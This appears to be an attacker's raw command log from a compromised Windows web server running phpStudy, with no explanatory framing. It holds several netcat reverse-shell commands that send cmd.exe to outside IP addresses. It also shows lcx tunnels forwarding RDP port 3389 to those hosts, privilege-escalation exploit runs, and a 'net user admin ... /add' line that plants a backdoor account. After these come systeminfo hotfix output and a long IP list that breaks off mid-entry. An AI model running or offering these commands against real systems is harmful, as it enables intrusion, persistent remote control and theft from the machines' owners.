
D:/bb404010/bb6/wasteremovaLguys.com/exp.exe whoami

D:/bb404010/bb6/wasteremovaLguys.com/16.EXE "whoami /all" 






D:/bb404010/bb6/wasteremovaLguys.com/nc.exe -e D:/bb404010/bb6/wasteremovaLguys.com/cmd2.exe 202.81.24.81 52

cd /d D:/bb404010/bb6/wasteremovaLguys.com/


D:/bb404010/bb6/wasteremovaLguys.com/1.exe  -pid 170884

D:/bb404010/bb6/wasteremovaLguys.com/exp.exe whoami

D:/bb404010/bb6/wasteremovaLguys.com/1.exe -exec nc.exe
                     
nc.exe  -e D:/bb404010/bb6/wasteremovaLguys.com/cmd2.exe  103.213.251.205 4433
					 
D:/phpStudy/WWW/lcx1.exe -slave 103.213.251.205 51 192.168.6.13 3389

D:/phpStudy/WWW/lcx1.exe -slave 202.181.24.81 51 127.0.0.1 3389


 cd /d D:/bb404010/bb6/wasteremovaLguys.com/
 
 D:/bb404010/bb6/wasteremovaLguys.com/cmd2.exe
 
  D:\phpStudy\WWW\nc.exe
  
  D:/phpStudy/Apache/bin/httpd.exe -k restart
 
 nc -vv 103.213.251.205 4433 -e  C:\Windows\System32\cmd.exe
 
  D:/bb404010/bb6/wasteremovaLguys.com/cmd2.exe whoami
  
  D:/bb404010/bb6/wasteremovaLguys.com/net.exe
  
D:/phpStudy/WWW/nc.exe  -e D:/bb404010/bb6/wasteremovaLguys.com/cmd2.exe  202.81.24.81 51
 
 D:/bb404010/bb6/wasteremovaLguys.com/net1.exe user admin ~!@aM774411 /add
 
 
 D:/bb404010/bb6/wasteremovaLguys.com/1.exe -exec 64.exe
 
 D:/bb404010/bb6/wasteremovaLguys.com/6.exe
 
 D:/bb404010/bb6/wasteremovaLguys.com/nc.exe -e D:/bb404010/bb6/wasteremovaLguys.com/cmd2.exe 103.213.251.205 52
 
 systeminfo
 
                   [01]: Intel64 Family 6 Model 58 Stepping 9 GenuineIntel ~1600 Mhz
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
                  [01]: KB2959936
                  [02]: KB2894852
                  [03]: KB2894856
                  [04]: KB2896496
                  [05]: KB2919355
                  [06]: KB2920189
                  [07]: KB2928120
                  [08]: KB2931358
                  [09]: KB2933826
                  [10]: KB2938066
                  [11]: KB2938772
                  [12]: KB2949621
                  [13]: KB2954879
                  [14]: KB2965500
                  [15]: KB2966407
                  [16]: KB2966826
                  [17]: KB2966828
                  [18]: KB2967917
                  [19]: KB2968296
                  [20]: KB2971203
                  [21]: KB2971850
                  [22]: KB2972103
                  [23]: KB2972213
                  [24]: KB2973114
                  [25]: KB2973448
                  [26]: KB2975061
                  [27]: KB2976627
                  [28]: KB2977629
                  [29]: KB2978122
                  [30]: KB2982998
                  [31]: KB2987107
                  [32]: KB2989647
                  [33]: KB2989930
                  [34]: KB3000850
                  [35]: KB3003057
                  [36]: KB3004365
                  [37]: KB3004545
                  [38]: KB3012702
                  [39]: KB3013172
                  [40]: KB3013769
                  [41]: KB3013791
                  [42]: KB3013816
                  [43]: KB3014442
                  [44]: KB3019978
                  [45]: KB3023219
                  [46]: KB3023266
                  [47]: KB3024751
                  [48]: KB3024755
                  [49]: KB3030947
                  [50]: KB3031044
                  [51]: KB3033446
                  [52]: KB3035126
                  [53]: KB3036612
                  [54]: KB3037576
                  [55]: KB3037924
                  [56]: KB3038002
                  [57]: KB3042085
                  [58]: KB3044374
                  [59]: KB3044673
                  [60]: KB3045634
                  [61]: KB3045685
                  [62]: KB3045717
                  [63]: KB3045719
                  [64]: KB3045755
                  [65]: KB3045999
                  [66]: KB3046017
                  [67]: KB3046737
                  [68]: KB3054169
                  [69]: KB3054203
                  [70]: KB3054256
                  [71]: KB3054464
                  [72]: KB3055323
                  [73]: KB3055343
                  [74]: KB3055642
                  [75]: KB3059317
                  [76]: KB3060681
                  [77]: KB3060793
                  [78]: KB3061512
                  [79]: KB3063843
                  [80]: KB3071756
                  [81]: KB3072307
                  [82]: KB3074545
                  [83]: KB3077715
                  [84]: KB3078405
                  [85]: KB3078676
                  [86]: KB3080149
                  [87]: KB3082089
                  [88]: KB3084135
                  [89]: KB3084905
                  [90]: KB3086255
                  [91]: KB3087041
                  [92]: KB3087137
                  [93]: KB3091297
                  [94]: KB3094486
                  [95]: KB3095701
                  [96]: KB3097992
                  [97]: KB3098779
                  [98]: KB3099834
                  [99]: KB3100473
                  [100]: KB3102429
                  [101]: KB3103616
                  [102]: KB3103696
                  [103]: KB3103709
                  [104]: KB3109103
                  [105]: KB3109976
                  [106]: KB3110329
                  [107]: KB3115224
                  [108]: KB3121261
                  [109]: KB3121461
                  [110]: KB3122651
                  [111]: KB3123245
                  [112]: KB3126434
                  [113]: KB3126587
                  [114]: KB3127222
                  [115]: KB3133043
                  [116]: KB3133690
                  [117]: KB3134179
                  [118]: KB3134815
                  [119]: KB3137728
                  [120]: KB3138602
                  [121]: KB3139164
                  [122]: KB3139398
                  [123]: KB3139914
                  [124]: KB3140219
                  [125]: KB3140234
                  [126]: KB3145384
                  [127]: KB3145432
                  [128]: KB3146604
                  [129]: KB3146723
                  [130]: KB3146751
                  [131]: KB3147071
                  [132]: KB3155784
                  [133]: KB3156059
                  [134]: KB3159398
                  [135]: KB3161949
                  [136]: KB3162343
                  [137]: KB3172614
                  [138]: KB3172729
                  [139]: KB3173424
                  [140]: KB3175024
                  [141]: KB3178539
                  [142]: KB3179574
                  [143]: KB3185319
                  [144]: KB4033428
                  [145]: KB4040981
                  [146]: KB4054566
                  [147]: KB4054568
                  [148]: KB4344145
                  [149]: KB4483187
                  [150]: KB4483450
                  [151]: KB4483459
                  [152]: KB4493446
                        [01]: 45.66.219.221
                        [02]: 45.66.219.220
                        [03]: 45.66.219.219
                        [04]: 45.66.219.218
                        [05]: 45.66.219.217
                        [06]: 45.66.219.216
                        [07]: 45.66.219.215
                        [08]: 45.66.219.214
                        [09]: 45.66.219.213
                        [10]: 45.66.219.212
                        [11]: 45.66.219.211
                        [12]: 45.66.219.210
                        [13]: 45.66.219.209
                        [14]: 45.66.219.208
                        [15]: 45.66.219.207
                        [16]: 45.66.219.206
                        [17]: 45.66.219.205
                        [18]: 45.66.219.204
                        [19]: 45.66.219.203
                        [20]: 45.66.219.202
                        [21]: 45.66.219.201
                        [22]: 45.66.219.200
                        [23]: 45.66.219.199
                        [24]: 45.66.219.198
                        [25]: 45.66.219.197
                        [26]: 45.66.219.196
                        [27]: 45.66.219.195
                        [28]: 45.66.219.194
                        [29]: 45.66.219.193
                        [30]: 45.66.218.221
                        [31]: 45.66.218.220
                        [32]: 45.66.218.219
                        [33]: 45.66.218.218
                        [34]: 45.66.218.217
                        [35]: 45.66.218.216
                        [36]: 45.66.218.215
                        [37]: 45.66.218.214
                        [38]: 45.66.218.213
                        [39]: 45.66.218.212
                        [40]: 45.66.218.211
                        [41]: 45.66.218.210
                        [42]: 45.66.218.209
                        [43]: 45.66.218.208
                        [44]: 45.66.218.207
                        [45]: 45.66.218.206
                        [46]: 45.66.218.205
                        [47]: 45.66.218.204
                        [48]: 45.66.218.203
                        [49]: 45.66.218.202
                        [50]: 45.66.218.201
                        [51]: 45.66.218.200
                        [52]: 45.66.218.199
                        [53]: 45.66.218.198
                        [54]: 45.66.218.197
                        [55]: 45.66.218.196
                        [56]: 45.66.218.195
                        [57]: 45.66.218.194
                        [58]: 45.66.218.193
                        [59]: 45.66.217.221
                        [60]: 45.66.217.220
                        [61]: 45.66.217.219
                        [62]: 45.66.217.218
                        [63]: 45.66.217.217
                        [64]: 45.66.217.216
                        [65]: 45.66.217.215
                        [66]: 45.66.217.214
                        [67]: 45.66.217.213
                        [68]: 45.66.217.212
                        [69]: 45.66.217.211
                        [70]: 45.66.217.210
                        [71]: 45.66.217.209
                        [72]: 45.66.217.208
                        [73]: 45.66.217.207
                        [74]: 45.66.217.206
                        [75]: 45.66.217.205
                        [76]: 45.66.217.204
                        [77]: 45.66.217.203
                        [78]: 45.66.217.202
                        [79]: 45.66.217.201
                        [80]: 45.66.217.200
                        [81]: 45.66.217.199
                        [82]: 45.66.217.198
                        [83]: 45.66.217.197
                        [84]: 45.66.217.196
                        [85]: 45.66.217.195
                        [86]: 45.66.217.194
                        [87]: 45.66.217.193
                        [88]: 45.66.216.221
                        [89]: 45.66.216.220
                        [90]: 45.66.216.219
                        [91]: 45.66.216.218
                        [92]: 45.66.216.217
                        [93]: 45.66.216.216
                        [94]: 45.66.216.215
                        [95]: 45.66.216.214
                        [96]: 45.66.216.213
                        [97]: 45.66.216.212
                        [98]: 45.66.216.211
                        [99]: 45.66.216.210
                        [100]: 45.66.216.209
                        [101]: 45.66.216.208
                        [102]: 45.66.216.207
                        [103]: 45.66.216.206
                        [104]: 45.66.216.205
                        [105]: 45.66.216.204
                        [106]: 45.66.216.203
                        [107]: 45.66.216.202
                        [108]: 45.66.216.201
                        [109]: 45.66.216.200
                        [110]: 45.66.216.199
                        [111]: 45.66.216.198
                        [112]: 45.66.216.197
                        [113]: 45.66.216.196
                        [114]: 45.66.216.195
                        [115]: 45.66.216.194
                        [116]: 45.66.216.193
                        [117]: 45.66.131.221
                        [118]: 45.66.131.220
                        [119]: 45.66.131.219
                        [120]: 45.66.131.218
                        [121]: 45.66.131.217
                        [122]: 45.66.131.216
                        [123]: 45.66.131.215
                        [124]: 45.66.131.214
                        [125]: 45.66.131.213
                        [126]: 45.66.131.212
                        [127]: 45.66.131.211
                        [128]: 45.66.131.210
                        [129]: 45.66.131.209
                        [130]: 45.66.131.208
                        [131]: 45.66.131.207
                        [132]: 45.66.131.206
                        [133]: 45.66.131.205
                        [134]: 45.66.131.204
                        [135]: 45.66.131.203
                        [136]: 45.66.131.202
                        [137]: 45.66.131.201
                        [138]: 45.66.131.200
                        [139]: 45.66.131.199
                        [140]: 45.66.131.198
                        [141]: 45.66.131.197
                        [142]: 45.66.131.196
                        [143]: 45.66.131.195
                        [144]: 45.66.131.194
                        [145]: 45.66.131.193
                        [146]: 45.66.130.221
                        [147]: 45.66.130.220
                        [148]: 45.66.130.219
                        [149]: 45.66.130.218
                        [150]: 4
